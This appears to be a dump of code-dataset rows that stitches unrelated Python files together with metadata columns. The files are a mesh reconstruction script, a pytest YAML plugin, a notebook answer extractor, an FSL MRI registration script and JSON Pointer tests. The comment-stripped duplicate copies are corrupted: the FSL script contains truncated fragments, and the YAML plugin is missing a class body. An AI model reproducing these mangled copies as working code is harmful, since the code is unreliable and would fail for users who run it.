            # [left:-1] silently dropped the final vertex from both calc_normal
            # and the color assignment. Clamp to len(color) instead.
            right = min(left + interval, len(color))
            net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
            nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
            color[left:right] = nml.T
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort: reconstruction failures are reported but do not abort the run.
        print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh for one sample and save it colored from the input image.

    Unlike gen_mesh, vertex colors are sampled from the input photograph by
    projecting each vertex into the image, rather than from predicted normals.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)
    net.filter_global(image_tensor_global)
    net.filter_local(image_tensor[:,None])
    # Stack predicted front/back normal maps onto the preview, when available.
    try:
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Preview image: denormalize each channel stack (to BGR, 0-255) and
        # lay the panels side by side.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)
        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # Project vertices into the image and sample their colors.
        xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
        uv = xyz_tensor[:, :2, :]
        color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
        color = color * 0.5 + 0.5
        # Optionally move the mesh back into world coordinates.
        if 'calib_world' in data:
            calib_world = data['calib_world'].numpy()[0]
            verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort: reconstruction failures are reported but do not abort the run.
        print(e)
def recon(opt, use_rect=False):
    """Load the checkpointed model and reconstruct a mesh for every test sample.

    Args:
        opt: parsed BaseOptions. Mostly overwritten by the options stored in
            the checkpoint; dataroot/resolution/results_path/loadSize are kept
            from the caller.
        use_rect: if True, use the bounding-box dataset (EvalDataset) instead
            of the pose-based one (EvalWPoseDataset).

    Raises:
        Exception: if no checkpoint file could be located.
    """
    # Resolve which checkpoint to load: explicit path, latest, or a given epoch.
    state_dict_path = None
    if opt.load_netMR_checkpoint_path is not None:
        state_dict_path = opt.load_netMR_checkpoint_path
    elif opt.resume_epoch < 0:
        state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
        opt.resume_epoch = 0
    else:
        state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
    start_id = opt.start_id
    end_id = opt.end_id
    cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
    state_dict = None
    if state_dict_path is not None and os.path.exists(state_dict_path):
        print('Resuming from ', state_dict_path)
        state_dict = torch.load(state_dict_path, map_location=cuda)
        print('Warning: opt is overwritten.')
        # Keep the caller's data/output settings; take everything else from
        # the options saved alongside the checkpoint.
        dataroot = opt.dataroot
        resolution = opt.resolution
        results_path = opt.results_path
        loadSize = opt.loadSize
        opt = state_dict['opt']
        opt.dataroot = dataroot
        opt.resolution = resolution
        opt.results_path = results_path
        opt.loadSize = loadSize
    else:
        raise Exception('failed loading state dict!', state_dict_path)
    if use_rect:
        test_dataset = EvalDataset(opt)
    else:
        test_dataset = EvalWPoseDataset(opt)
    print('test data size: ', len(test_dataset))
    projection_mode = test_dataset.projection_mode
    # Rebuild the coarse network and the multi-resolution wrapper around it.
    opt_netG = state_dict['opt_netG']
    netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
    netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
    def set_eval():
        netG.eval()
    netMR.load_state_dict(state_dict['model_state_dict'])
    os.makedirs(opt.checkpoints_path, exist_ok=True)
    os.makedirs(opt.results_path, exist_ok=True)
    os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
    # Negative ids mean "from the beginning" / "to the end" of the dataset.
    if start_id < 0:
        start_id = 0
    if end_id < 0:
        end_id = len(test_dataset)
    # Bug fix: this line had been corrupted to `ith torch.no_grad():`
    # (a SyntaxError); restored the `with` statement.
    with torch.no_grad():
        set_eval()
        print('generate mesh (test) ...')
        for i in tqdm(range(start_id, end_id)):
            if i >= len(test_dataset):
                break
            # For multi-person processing, switch to the else branch.
            if True:
                test_data = test_dataset[i]
                save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
                print(save_path)
                gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
            else:
                for j in range(test_dataset.get_n_person(i)):
                    test_dataset.person_id = j
                    test_data = test_dataset[i]
                    save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
                    gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
    """Parse command-line *args* and run :func:`recon` with the result."""
    recon(parser.parse(args), use_rect)
if __name__ == '__main__':
    # Script entry point: reconstruct meshes using options from sys.argv.
    reconWrapper()
| true | true |
f72ee1276e038c14fc8978d9c956dd65a321b3bd | 1,588 | py | Python | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | import yaml, pytest
def pytest_collect_file(parent, path):
    """Collection hook: turn every ``test*.yml`` file into a YamlFile node."""
    is_yaml = path.ext == ".yml"
    looks_like_test = path.basename.startswith("test")
    if is_yaml and looks_like_test:
        return YamlFile.from_parent(parent, fspath=path)
    return None
class YamlException(Exception):
    """Raised when a YAML test spec is malformed or its check fails."""
class YamlFile(pytest.File):
    """A collected ``test*.yml`` file; each top-level entry becomes an item."""

    def collect(self):
        """Yield one :class:`YamlItem` per spec dictionary in the file."""
        specs = yaml.safe_load(self.fspath.open())
        for entry in specs:
            yield YamlItem.from_parent(self, name=entry["name"], spec=entry)
class YamlItem(pytest.Item):
    """A single test case described by one spec dictionary from a YAML file."""

    def __init__(self, name, parent, spec):
        super().__init__(name, parent)
        # Raw dictionary describing the test case.
        self.spec = spec

    def runtest(self):
        """Validate the spec, then run the (pseudo) compression check."""
        kind = self.spec.get("type")
        if kind != "check-compression":
            raise YamlException(f"unknown test type: {kind}")

        codec = self.spec.get("codec")
        if codec != "mp3":
            raise YamlException(f"unknown codec: {codec}")

        # pseudo check: pretend the measured compression ratio is fixed
        src = self.spec.get("inputfile")
        expected = self.spec.get("compression")
        measured = "15%"
        if expected != measured:
            raise YamlException(
                f"compression of {src} was {measured}, "
                f"expected {expected}")

    def repr_failure(self, excinfo):
        """Called when self.runtest() raises an exception."""
        if isinstance(excinfo.value, YamlException):
            return f"spec failed: {excinfo.value}"
        return super().repr_failure(excinfo)

    def reportinfo(self):
        # Location shown in pytest's report header.
        return self.fspath, 0, f"usecase: {self.name}"
| 31.76 | 66 | 0.61398 | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| true | true |
f72ee154024e635c3e3a687f0aa84471ed485cdc | 594 | py | Python | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 19 | 2017-11-06T03:19:37.000Z | 2020-12-05T07:20:52.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 1 | 2017-07-27T17:58:38.000Z | 2017-11-02T07:22:44.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 4 | 2017-12-27T11:05:48.000Z | 2021-03-08T17:12:11.000Z | import json
import os
# Collect every markdown "ANSWER" cell from each notebook in the current
# directory and write the concatenated answers to a per-notebook text file.
files = os.listdir()
for file in files:
    if not file.endswith('.ipynb'):
        continue
    answers = ''
    with open(file) as data:
        nb = json.load(data)
    for cell in nb['cells']:
        if cell['cell_type'] != 'markdown':
            continue
        # Only cells whose first source line is flagged as an answer count.
        if 'source' in cell and len(cell['source']) > 0:
            if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
                answers += ''.join(cell['source']) + '\n'
    # Context manager ensures the output file is closed even if write fails
    # (the original used open()/close() without try/finally).
    with open('responses for ' + file[:-6] + '.txt', 'w') as f:
        f.write(answers)
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | true | true |
f72ee175ab02cfd09b428ee248b15c9490ae2b60 | 4,403 | py | Python | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | 1 | 2020-09-23T00:57:20.000Z | 2020-09-23T00:57:20.000Z | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null |
import os
# Subject/file configuration. All Windows paths are mapped to their WSL
# mount points so the FSL tools (run through `bash -lc`) can see them.
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'

# for aal (kept for reference):
#atlas_template = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_template.nii'
#atlas_template = atlas_template.replace('C:', '/mnt/c')
#atlas_label = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_atlas.nii'
#atlas_label = atlas_label.replace('C:', '/mnt/c')

# for megaatlas:
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')

main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name


def _run_wsl(cmd):
    """Normalise path separators to '/' and execute *cmd* via os.system.

    Every FSL call below previously repeated the same
    cmd.replace(os.sep, '/') + os.system(cmd) boilerplate; this helper
    centralises it without changing the executed command strings.
    """
    os.system(cmd.replace(os.sep, '/'))


## Registration from MPRAGE to 1st CHARMED scan using inverse matrix of
## CHARMED to MPRAGE registration:
# From CHARMED to MPRAGE:
subj_mprage = subj_folder + mprage_file_name
subj_first_charmed = subj_folder + first_charmed_file_name
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] + '.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
_run_wsl('bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(
    subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options))

# Creation of inverse matrix:
inv_mat = out_registered_mat[:-4] + '_inv.mat'
_run_wsl('bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat))

# From MPRAGE to CHARMED using the inverse matrix:
out_registered = subj_folder + 'r' + mprage_file_name
_run_wsl('bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(
    subj_mprage, subj_first_charmed, out_registered, inv_mat))

## BET for registered MPRAGE and mni template:
# BET (brain extraction) for registered MPRAGE:
out_brain = out_registered[:-4] + '_brain'
_run_wsl('bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain, '-f 0.40', '-g 0.20'))

# BET for mni template:
'''
# if not performed before, run:
atlas_brain = atlas_template[:-4] + '_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(atlas_template[:-4], atlas_brain,'-f 0.45','-g -0.1')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
'''

## Registration from MNI to registered MPRAGE:
# flirt (affine) for MNI to registered MPRAGE as primary guess:
options = r'-bins 256 -cost corratio -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder + 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
_run_wsl('bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(
    out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options))

# fnirt (non-linear) for MNI based on the flirt result:
#warp_name = subj_folder + 'atlas2subj.nii'
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
_run_wsl('bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(
    out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name))

# apply fnirt warp on atlas template:
atlas_registered = os.path.join(subj_folder + 'rr' + atlas_brain.split(sep="\\")[-1])
_run_wsl('bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(
    out_brain, atlas_brain, atlas_registered, warp_name, 'nn'))

# apply fnirt warp on atlas labels:
atlas_labels_registered = os.path.join(subj_folder + 'r' + atlas_label.split(sep="\\")[-1])
_run_wsl('bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(
    out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn'))

## FAST tissue segmentation:
options = r'-t 1 -n 3 -H 0.1 -I 4 -l 10.0 -o'
_run_wsl('bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain))

print('Finished file prep for ' + subj_name[:-1])
| 41.537736 | 156 | 0.712242 |
import os
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
ame
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
md = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
rchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| true | true |
f72ee19e4a5aeceed8da6d03d596230a32b33ef5 | 7,332 | py | Python | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | 1 | 2021-05-28T13:39:14.000Z | 2021-05-28T13:39:14.000Z | jref/test/test_pointer.py | biochimia/python-jref | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
    """Unit tests for JSON Pointer (RFC 6901) resolution via ``Pointer``."""

    def setUp(self):
        # Unique object so tests can verify lookups return the exact value.
        self.sentinel = object()

    def check_pointer_is_sentinel(self, pointer, document):
        # Helper: assert that *pointer* resolves to the sentinel in *document*.
        self.check_pointer_equal(document, pointer, self.sentinel)

    def check_pointer_equal(self, document, pointer, value):
        # Helper: assert the resolution result.  NOTE(review): argument order
        # (document, pointer) is reversed relative to the helper above.
        self.assertEqual(Pointer.resolve_in(pointer, document), value)

        # test that starting slash in non-empty pointer is optional
        if (len(pointer) > 1
                and pointer[0] == '/'):
            self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)

    def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
        self.assertEqual(
            Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
        self.assertEqual(
            Pointer('key').resolve_in(document={'key': self.sentinel}),
            self.sentinel)

    def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
        self.assertEqual(
            Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
        self.assertEqual(
            Pointer.resolve_in('key', document={'key': self.sentinel}),
            self.sentinel)

    def test_an_empty_pointer_resolves_to_the_document(self):
        self.check_pointer_is_sentinel('', document=self.sentinel)

    def test_empty_root_resolves_to_empty_key(self):
        # '/' addresses the member whose key is the empty string.
        self.check_pointer_is_sentinel('/', document={'': self.sentinel})

    def test_it_can_access_a_map_item_by_key(self):
        doc = { 'key': self.sentinel }
        self.check_pointer_is_sentinel('/key', doc)

    def test_it_can_access_nested_map_items_by_key(self):
        doc = { 'nested': { 'key': self.sentinel } }
        self.check_pointer_is_sentinel('/nested/key', doc)

    def test_it_can_access_array_element_by_index(self):
        doc = [ 1, 2, self.sentinel, 4, 5 ]
        self.check_pointer_is_sentinel('/2', doc)

    def test_it_handles_complex_nesting(self):
        # Mixed dict/list nesting exercised from both a dict root and a
        # list root.
        doc1 = {
            'a': [
                1, 2, {
                    'c': [ 3, 4 ],
                    'd': 5,
                },
            ],
            'b': {
                'f': [ 6, 7, 8 ],
            },
        }
        self.check_pointer_equal(doc1, '/a/0', 1)
        self.check_pointer_equal(doc1, '/a/1', 2)
        self.check_pointer_equal(doc1, '/a/2/c/0', 3)
        self.check_pointer_equal(doc1, '/a/2/c/1', 4)
        self.check_pointer_equal(doc1, '/a/2/d', 5)
        self.check_pointer_equal(doc1, '/b/f/0', 6)
        self.check_pointer_equal(doc1, '/b/f/1', 7)
        self.check_pointer_equal(doc1, '/b/f/2', 8)

        doc2 = [
            1, 2, {
                'a': 3,
                'b': {
                    'c': 4,
                    'd': [ 5 ],
                },
            },
        ]
        self.check_pointer_equal(doc2, '/0', 1)
        self.check_pointer_equal(doc2, '/1', 2)
        self.check_pointer_equal(doc2, '/2/a', 3)
        self.check_pointer_equal(doc2, '/2/b/c', 4)
        self.check_pointer_equal(doc2, '/2/b/d/0', 5)

    def test_it_supports_numerical_keys(self):
        # Numeric tokens address string keys when the document is a dict.
        self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
        self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
        self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})

    def test_it_supports_dash_as_a_map_key(self):
        self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})

    def test_it_raises_an_error_for_dash_as_an_array_index(self):
        # RFC 6901's '-' (past-the-end array index) is not supported here.
        with self.assertRaises(error.DashArrayIndexNotSupported):
            Pointer.resolve_in('/-', document=[])
        with self.assertRaises(error.DashArrayIndexNotSupported):
            Pointer.resolve_in('-', document=[])

    def test_it_raises_an_error_for_array_index_out_of_range(self):
        with self.assertRaises(error.IndexOutOfRange):
            Pointer.resolve_in('/5', document=[])
        with self.assertRaises(error.IndexOutOfRange):
            Pointer.resolve_in('5', document=[])

    def test_it_raises_an_error_for_non_numeric_array_index(self):
        with self.assertRaises(error.InvalidArrayIndex):
            Pointer.resolve_in('/key', document=[])
        with self.assertRaises(error.InvalidArrayIndex):
            Pointer.resolve_in('key', document=[])

    def test_it_raises_an_error_if_key_not_in_document(self):
        with self.assertRaises(error.MemberNotDefined):
            Pointer.resolve_in('/key', document={})
        with self.assertRaises(error.MemberNotDefined):
            Pointer.resolve_in('key', document={})

    def test_it_recognizes_tilde_escapes(self):
        # RFC 6901 escapes: '~0' -> '~' and '~1' -> '/'.
        doc = {
            'a~b': 1,
            'ab~': 2,
            '~ab': 3,
            'a/b': 4,
            'ab/': 5,
            '/ab': 6,
            '~/~': 7,
            '/~/': 8,
            '~0': 9,
            '~1': 10,
        }
        self.check_pointer_equal(doc, '/a~0b', 1)
        self.check_pointer_equal(doc, '/ab~0', 2)
        self.check_pointer_equal(doc, '/~0ab', 3)
        self.check_pointer_equal(doc, '/a~1b', 4)
        self.check_pointer_equal(doc, '/ab~1', 5)
        self.check_pointer_equal(doc, '/~1ab', 6)
        self.check_pointer_equal(doc, '/~0~1~0', 7)
        self.check_pointer_equal(doc, '/~1~0~1', 8)
        self.check_pointer_equal(doc, '/~00', 9)
        self.check_pointer_equal(doc, '/~01', 10)

    def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
        with self.assertRaises(error.UnrecognizedEscapeSequence):
            Pointer.resolve_in('/~2', document={})
        with self.assertRaises(error.UnrecognizedEscapeSequence):
            Pointer.resolve_in('~2', document={})

    def test_it_raises_an_error_on_unescaped_tilde(self):
        with self.assertRaises(error.UnescapedTilde):
            Pointer.resolve_in('/~', document={})
        with self.assertRaises(error.UnescapedTilde):
            Pointer.resolve_in('~', document={})

    def test_it_raises_an_error_if_unable_to_resolve_token(self):
        with self.assertRaises(error.UnreferenceableValue):
            Pointer.resolve_in('/key', document=object())
        with self.assertRaises(error.UnreferenceableValue):
            Pointer.resolve_in('key', document=object())

    def test_it_offers_support_for_lazy_loaded_values(self):
        # Objects exposing __lazy_eval__ are evaluated before resolution.
        class LazyValue:
            def __lazy_eval__(self):
                return {'a': 1, 'b': 2, 'c': 3}

        value = LazyValue()
        self.assertEqual(Pointer.resolve_in('/a', value), 1)
        self.assertEqual(Pointer.resolve_in('/b', value), 2)
        self.assertEqual(Pointer.resolve_in('/c', value), 3)

    def test_it_offers_support_for_recursive_lazy_loaded_values(self):
        # __lazy_eval__ results are themselves lazily evaluated.
        class LazyValue:
            def __lazy_eval__(self):
                return {'a': 1, 'b': 2, 'c': 3}

        class EvenLazierValue:
            def __lazy_eval__(self):
                return LazyValue()

        value = EvenLazierValue()
        self.assertEqual(Pointer.resolve_in('/a', value), 1)
        self.assertEqual(Pointer.resolve_in('/b', value), 2)
        self.assertEqual(Pointer.resolve_in('/c', value), 3)
| 37.6 | 79 | 0.598882 | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
